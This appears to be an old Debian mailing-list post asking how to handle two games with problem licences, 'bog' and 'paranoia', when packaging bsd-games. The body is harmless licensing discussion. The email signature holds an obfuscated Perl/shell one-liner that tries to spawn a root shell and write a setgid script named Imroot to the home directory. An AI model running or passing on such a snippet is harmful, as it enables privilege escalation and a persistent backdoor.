bsd-games -- copyright question

I'd like to package up the bsd-games, since it's sometimes nice to have
these old games around. But I have a question about copyright.

The package is composed of a bunch of separate games, each with their own
copyright. Most just have the BSD copyright or some varient that will let
them be distributed in debian. The two problems are:

A game called "paranioa", which lacks a copyright entirely.

A game called "bog", with the following copyright, which keeps it out of
debian:

                           About This Program

Permission is given to freely copy and distribute this software providing:

1) You do not sell it,
2) You do not use it for commercial advantage,
3) If you pass the program on you must make the source code available, and
4) This notice must accompany the distribution

Please notify the author of any bugs or if you have any suggestions.

Copyright (c) 1988:
Barry Brachman
Dept. of Computer Science
Univ. of British Columbia
Vancouver, B.C. V6T 1W5

I can easily package up all the other games except these two (actually, I
may make a separate non-free package just for bog, becuase it's the reason I
wanted to package up the bsd games in the first place.) But should I leave
the source code from these 2 games in the source package, or delete it? I'd
say from the copyright, it would be safer to delete it, but that's an ugly
modification to make to the source package.

--
#!/usr/bin/perl -i$>=0;$<=0;exec"/bin/sh"'>achmod             joey@kite.ml.org
$_="echo '#!/usr/bin/suidperl -U\n$^I 2755aa";s=a= $ENV{HOME}/Imroot;=g;exec$_